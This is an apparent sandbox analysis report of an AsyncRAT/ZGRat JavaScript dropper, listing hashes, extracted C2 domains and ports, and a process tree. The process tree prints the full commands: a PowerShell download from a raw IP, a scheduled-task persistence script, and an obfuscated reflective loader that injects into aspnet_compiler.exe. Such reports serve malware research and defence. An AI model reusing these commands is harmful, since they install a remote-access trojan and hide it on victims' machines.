asyncrat | 8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60

Analysis

max time kernel
147s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
07-12-2023 07:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
Size

7KB
MD5

b2195fa1ea604007f7a3664e0e49f591
SHA1

915985302f8fb7f37d07d22a8ec5cb5e8005fb47
SHA256

8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60
SHA512

478d9dcd9391a2e224bd291325dde58883d197d4cec1d989a3f054363dc03e19075e174058db828fbfc668cb76e2cd2b73782bbad3cd6a582383a62d37a8b977
SSDEEP

96:xBdMQYYVlVS+RwbkiEi3gkFmRePXywbkOEi3ckFmRePXuUxBbLDIX3FU3i:qQYYXVS+R9SgbEPihScbEP+cBb+3FGi

Score

10^/10

asyncrat zgrat js rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://23.145.120.49:249/js.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nodejs.org/download/release/v6.17.1/win-x64/node.exe

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

wpmediatech.com:6606

wpmediatech.com:7707

wpmediatech.com:8808

Mutex

AsyncMutex_aloshx

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/396-115-0x0000025FDB930000-0x0000025FDB988000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4904-116-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exeWScript.execmd.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 396 set thread context of 4904	396	powershell.exe	aspnet_compiler.exe
PID 5068 set thread context of 3580	5068	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000_Classes\Local Settings cmd.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2037190880-819243489-950462038-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exepowershell.exenode.exenode.exepowershell.exepowershell.exeaspnet_compiler.exenode.exepowershell.exe

pid	process
1980	powershell.exe
1980	powershell.exe
3552	powershell.exe
3552	powershell.exe
3552	powershell.exe
4400	node.exe
4400	node.exe
1072	node.exe
1072	node.exe
1876	powershell.exe
1876	powershell.exe
396	powershell.exe
396	powershell.exe
1876	powershell.exe
396	powershell.exe
4904	aspnet_compiler.exe
4904	aspnet_compiler.exe
1972	node.exe
1972	node.exe
5068	powershell.exe
5068	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	1876	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	4904	aspnet_compiler.exe
Token: SeDebugPrivilege	5068	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

aspnet_compiler.exe

pid process

4904 aspnet_compiler.exe

pid	process
4904	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

wscript.exepowershell.exeWScript.exemousocoreworker.execmd.exeWScript.exeWScript.exenode.execmd.exenode.execmd.exepowershell.exeWScript.exenode.execmd.exepowershell.exe

description	pid	process	target process
PID 5112 wrote to memory of 1980	5112	wscript.exe	powershell.exe
PID 5112 wrote to memory of 1980	5112	wscript.exe	powershell.exe
PID 1980 wrote to memory of 1184	1980	powershell.exe	WScript.exe
PID 1980 wrote to memory of 1184	1980	powershell.exe	WScript.exe
PID 1184 wrote to memory of 4300	1184	WScript.exe	mousocoreworker.exe
PID 1184 wrote to memory of 4300	1184	WScript.exe	mousocoreworker.exe
PID 4300 wrote to memory of 4964	4300	mousocoreworker.exe	net1.exe
PID 4300 wrote to memory of 4964	4300	mousocoreworker.exe	net1.exe
PID 1184 wrote to memory of 2008	1184	WScript.exe	cmd.exe
PID 1184 wrote to memory of 2008	1184	WScript.exe	cmd.exe
PID 2008 wrote to memory of 3552	2008	cmd.exe	powershell.exe
PID 2008 wrote to memory of 3552	2008	cmd.exe	powershell.exe
PID 2008 wrote to memory of 2472	2008	cmd.exe	WScript.exe
PID 2008 wrote to memory of 2472	2008	cmd.exe	WScript.exe
PID 2008 wrote to memory of 4352	2008	cmd.exe	WScript.exe
PID 2008 wrote to memory of 4352	2008	cmd.exe	WScript.exe
PID 2472 wrote to memory of 4400	2472	WScript.exe	node.exe
PID 2472 wrote to memory of 4400	2472	WScript.exe	node.exe
PID 4352 wrote to memory of 1072	4352	WScript.exe	node.exe
PID 4352 wrote to memory of 1072	4352	WScript.exe	node.exe
PID 4400 wrote to memory of 4384	4400	node.exe	cmd.exe
PID 4400 wrote to memory of 4384	4400	node.exe	cmd.exe
PID 4384 wrote to memory of 1876	4384	cmd.exe	powershell.exe
PID 4384 wrote to memory of 1876	4384	cmd.exe	powershell.exe
PID 1072 wrote to memory of 4720	1072	node.exe	cmd.exe
PID 1072 wrote to memory of 4720	1072	node.exe	cmd.exe
PID 4720 wrote to memory of 396	4720	cmd.exe	powershell.exe
PID 4720 wrote to memory of 396	4720	cmd.exe	powershell.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 396 wrote to memory of 4904	396	powershell.exe	aspnet_compiler.exe
PID 3340 wrote to memory of 1972	3340	WScript.exe	node.exe
PID 3340 wrote to memory of 1972	3340	WScript.exe	node.exe
PID 1972 wrote to memory of 1224	1972	node.exe	cmd.exe
PID 1972 wrote to memory of 1224	1972	node.exe	cmd.exe
PID 1224 wrote to memory of 5068	1224	cmd.exe	powershell.exe
PID 1224 wrote to memory of 5068	1224	cmd.exe	powershell.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe
PID 5068 wrote to memory of 3580	5068	powershell.exe	aspnet_compiler.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.145.120.49:249/js.jpg' -Destination 'C:\Users\Public\zip.zip'; Expand-Archive -Path 'C:\Users\Public\zip.zip' -DestinationPath 'C:\Users\Public\' -Force;Remove-Item C:\Users\Public\zip.zip; C:\Users\Public\brave.vbs
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\brave.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1184

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" session
4⤵
PID:4300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2472

C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\install.js
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);"
7⤵
- Suspicious use of WriteProcessMemory
PID:4384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c $tr = New-Object -ComObject Schedule.Service;$tr.Connect();$ta = $tr.NewTask(0);$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes';$ta.Settings.Enabled = $true;$ta.Settings.DisallowStartIfOnBatteries = $false;$st = $ta.Triggers.Create(1);$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss');$st.Repetition.Interval = 'PT2M';$md = $ta.Actions.Create(0);$md.Path = 'C:\Users\Public\app.js';$ns = $tr.GetFolder('\');$ns.RegisterTaskDefinition('Media', $ta, 6, $null, $null, 3);
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4352

C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""
7⤵
- Suspicious use of WriteProcessMemory
PID:4720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"
8⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4904

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4300

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\app.js"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3340

C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));""
3⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $Jxxxe) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$Jxxxe = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$geGWHZ = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$load = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$new1 = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$method = (Get-Content -Path 'C:\Users\Public\method.dll');$wex = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $Jxxxe;[Byte[]]$Coment = User $geGWHZ; break; } catch {; };};[Reflection.Assembly]::$load($Coment).$type($new1).$method($wex).$invoke($null,[object[]] ($Framework,$null,$JR,$true));"
4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
5⤵
PID:3580

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
e5ab5d093e49058a43f45f317b401e68

SHA1
120da069a87aa9507d2b66c07e368753d3061c2d

SHA256
4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74

SHA512
d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8c93b50b44099e1b2aacccdd85970e14

SHA1
c4a546dbbcb21968583e7bcdf9ea9501ee3a0bb0

SHA256
802f6ffb46b82605ade11351529d38526db573e5e71858be5bc435db75b13f48

SHA512
1e13e0e06029c8a705dc1ad1b2dd75e31a237611fc4e82423e78bd35ca0bdaa2751e64209ef68e9c6672ea618184f21c541b7547395f8f2c25d91d61247937ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
99b64d4346b7109a0b6bdb39b35fad4a

SHA1
16661afa04651c5e165904b61bdee5ffa37991d2

SHA256
4058e21da225dadf3f5ce6008dab2d9d3d997ef486963becdc53373739724966

SHA512
c749b12fa8d3c49833c7c270ff5437dd038eaa6f4165911583c0d08d5f4ba66696deae14f8642ee95c6420728f0db804e7283871d819e7f88eb8c0fda18ff289

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
99b64d4346b7109a0b6bdb39b35fad4a

SHA1
16661afa04651c5e165904b61bdee5ffa37991d2

SHA256
4058e21da225dadf3f5ce6008dab2d9d3d997ef486963becdc53373739724966

SHA512
c749b12fa8d3c49833c7c270ff5437dd038eaa6f4165911583c0d08d5f4ba66696deae14f8642ee95c6420728f0db804e7283871d819e7f88eb8c0fda18ff289

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
2KB

MD5
5b54aabc7de5d1ccf5faaffecc7325cf

SHA1
a07058a401b98ec3a0b55d9433157483dc63a541

SHA256
500e1f463566679c304dce99d144cac756773bcc786238fbe3855657fbee8170

SHA512
46f97e48aca52836f71e7b6b680d58484e750b12d49a8eb06fb9768adec8049dac2024514e187b9bb2aec57c1fd32239e8644c1683f1bb625886d0d15382a5ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4frmulpz.bzb.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Execute.dll
Filesize
56B

MD5
529cf04db0f736467c7583ea80c3aa66

SHA1
7628148337b1d3d700c8151f76a1595b6f5123b8

SHA256
67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520

SHA512
f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4

Download Submit
C:\Users\Public\Framework.dll
Filesize
520B

MD5
6a08392ecf95df7fc91917dcfaae8da6

SHA1
480f6a5c761e1a069c0d68f5ac2aabf727791393

SHA256
0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460

SHA512
d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e

Download Submit
C:\Users\Public\app.js
Filesize
353B

MD5
a307c4557d5fdf209e1b38a803e03b52

SHA1
14e00c86caadf2ed0949dc7a3f6bffbb5b9cd0fa

SHA256
3a16f15174757a5f84ae743db042b62b2554620118de63be2e7086827f114bf5

SHA512
2c6ad68b4bfe3cd0260712da43a48f1e9b0d60d555be80560a892fb21617061f4efa02c3bb078fb0f02fdd432c48afb88e5f5ec9a05fb82124face2a27a3ac66

Download Submit
C:\Users\Public\brave.vbs
Filesize
2KB

MD5
8c2bd49f41e4a825fc7f030bb38143f6

SHA1
290b7da6cdd513b6d06deca81c288fa6f8a92b1f

SHA256
2b58d54f0620f94e37f97ef5d4281b9ba50e171fd542967f22a3053096315b03

SHA512
1d6dcbf178c4ed4f60e99b8555f2c420e550e1bb91777a4ce1f01ce2d801d964ced6ff0ca74972370b150f31d63624788380448732b50ce9ec7e58c64c3aa17d

Download Submit
C:\Users\Public\install.js
Filesize
796B

MD5
5727e0cb34eac044ea5495b99b7a2f8c

SHA1
6b99de1c9f92718e0053645c2e597d745f23ae34

SHA256
633dc94e7d8e997438a21ac12d05ef1614f7ef8b3df815ea19041880dd0ad8d9

SHA512
300fa4ce3943279b7eff9dd844e8713a1d3a414f6217d881158181440bb187f16715fc494134dc584c826ead713a8d8f9a0f4ff1e17b2b37aef09e88c5ea603b

Download Submit
C:\Users\Public\invoke.dll
Filesize
6B

MD5
b9376e9e3c4d48f5e35a3f355ae1f74a

SHA1
c65605adf5270f5065089b0189da542274d30db0

SHA256
90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9

SHA512
5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591

Download Submit
C:\Users\Public\load.dll
Filesize
4B

MD5
f19dbf2edb3a0bd74b0524d960ff21eb

SHA1
ddcb77ff769ea54ca622848f6bedd4004fa4f4fa

SHA256
8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3

SHA512
f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216

Download Submit
C:\Users\Public\method.dll
Filesize
9B

MD5
38b97710070dbdd7b3359c0d52da4a72

SHA1
4ce08d2147c514f9c8e1f83d384369ec8986bc3b

SHA256
675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7

SHA512
b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c

Download Submit
C:\Users\Public\msg.dll
Filesize
129KB

MD5
6582381682a8618da150ce6c3de6a227

SHA1
0f34186a7fc3519005dcc369aab22a109ba8f2da

SHA256
b1805c2c47cb2734111e8b03b3e305de22c4c3149fb3dff96c869df59d806e9e

SHA512
338b76b56fb4aa89d485f1519942fd1ab09facd5f6e06d92c1038bc53cfc389514b98065ad5ded74c1eada98d0950f218d17bab0ca2b0d4cb1ece71c9b467bdc

Download Submit
C:\Users\Public\node.bat
Filesize
604B

MD5
48e50f8d07d71b99772fcaff006ff53e

SHA1
ae7caa69a56d643466003567d1560ca369bcec37

SHA256
360eb0a4b12c48059e0b58994bf42d9525a6cba97f6b8f4dc70fbbcfa4792957

SHA512
1a6fb38519a7181c20fd2465945e8dd01057ad8a223362fa8af73f91e7a079ca34ca9b76787d92ba733f02ea795a8cddacc93e33af32fe8f51a548bdec5e2438

Download Submit
C:\Users\Public\run.js
Filesize
8KB

MD5
9840c805e56a4b32437e7985520eda6c

SHA1
360d4fdc697375269b509304cb8f3ffa52df524a

SHA256
ae5af88d556975ffb39af6c7d12da330de39a7eaaf65f6fd9c9414253e0f5334

SHA512
01f7d8ecb5c7d516763825c071aeb9ca786bcd686765cfb789df23a26c6b914dec259fa03a1ab190fb33a0af3e35b4c7afe11c8e9cf0d469818bdf331f6c3d67

Download Submit
C:\Users\Public\runpe.dll
Filesize
656KB

MD5
3afb403063fe1faf571332a4afcf238c

SHA1
7db1273349ddc765ccaa15c97148a849d3a300f8

SHA256
66980cc688f22905fcb2d034bec4777d71f8fdd30beceb4dac7a71bf7f6abeed

SHA512
50d975edec1ca36d817371e6dbe3e4020537d4c86076c1ba2cfd434c0bf136d0004a44bd3182a79a80bfb1da2c6eae20e5aecd1a22a6c220bb4dd76755e1ef8a

Download Submit
C:\Users\Public\shell.js
Filesize
182B

MD5
d71e2d55ee0534b06313f71aefd921b9

SHA1
6c7713299bdcb1cc4046b7612775c24ddf68ad82

SHA256
43bdd5e0b846271a4bae3a4f74c8310b914497abd2ffe0e1886ec9fec9f25ecd

SHA512
6e5f222fa12d4dad713d5e8dd6a443d09ba5f715fa8701b5b26edf0f1ae8204d65eb560b003dfbc5b2f240079dc2c4eb06b9c2245de24338fa9a5c80647eb536

Download Submit
C:\Users\Public\type.dll
Filesize
7B

MD5
be784e48d0174367297b636456c7bcf1

SHA1
8c906d9e0e2439238b3263e087aee3d98fa86dea

SHA256
510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136

SHA512
aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4

Download Submit
C:\Users\Public\xx.dll
Filesize
72B

MD5
14c2a6b7bf15e15d8dae9cd4a56432d5

SHA1
0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016

SHA256
